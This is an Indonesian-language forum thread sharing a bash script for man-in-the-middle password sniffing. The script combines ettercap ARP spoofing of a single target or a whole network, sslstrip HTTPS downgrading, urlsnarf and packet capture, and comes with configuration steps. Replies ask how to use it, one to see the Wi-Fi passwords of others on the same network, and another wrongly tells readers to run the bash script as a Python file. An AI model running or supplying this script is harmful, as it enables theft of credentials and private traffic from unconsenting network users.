Script for sniffing passwords + data
#1
Jalan - jalan pas liburan puasa Smile

Nemu script yang kayaknya lumayan berguna....

First of all, make sure your etter.conf is default. Your etter.conf is located at /etc/etter.conf - this section must remain commented out:

Code:
# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

This is because i use ettercap to do the arpspoofing, but i dont want it to do the fake certificate thing (we have sslstrip to do the job).

Lalu, ini dia scriptnya...
Save dengan ekstensi .sh ya.. Lalu mark as executable...

Code:
#!/bin/bash
echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
read -e XTRACT
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci


Silakan dicoba Smile

Sumber : http://ipsite.org/12c1
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#2
izin icip bro...

#3
di tes dolo yak bro

#4
(08-02-2011, 03:03 PM)k41t0 Wrote: izin icip bro...

(08-02-2011, 03:29 PM)cassaprodigy Wrote: di tes dolo yak bro

Silakan om Smile

Ane ngetes, makan resource memory banyak bener..
Suram....
Tapi lumayan beberapa ke trace
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#5
cara ngetestnya gimna ya om. Big Grin maklum masih belum paham saya om Big Grin
An Ordinary Indonesian. Rakyat Indonesia biasa saja.

#6
itu copas saja bro ... terus save dengan extention py...
ntar jalanin dengan

python namafile.py

atau chmod dulu

chmod +x

biar tinggal

./namafile.py

note : jgn lupa ya edit2 tuh etter.confnya

#7
om ane udh ikutin tutor tp gmna cara make programnya yah?
ane mau liat password yg 1 jaringan sama ane via wi fi
inikah hidup?

#8
ijin coba bro . . .
kayaknya asik ni Smile
Spoiler! :
<<Back|Track
☆‍‍‍‍☆‍‍‍‍☆‍‍‍‍☆☆


#9
Ijin nyobain ya om Angry
kayaknya keren deh Smile






Users browsing this thread: 1 Guest(s)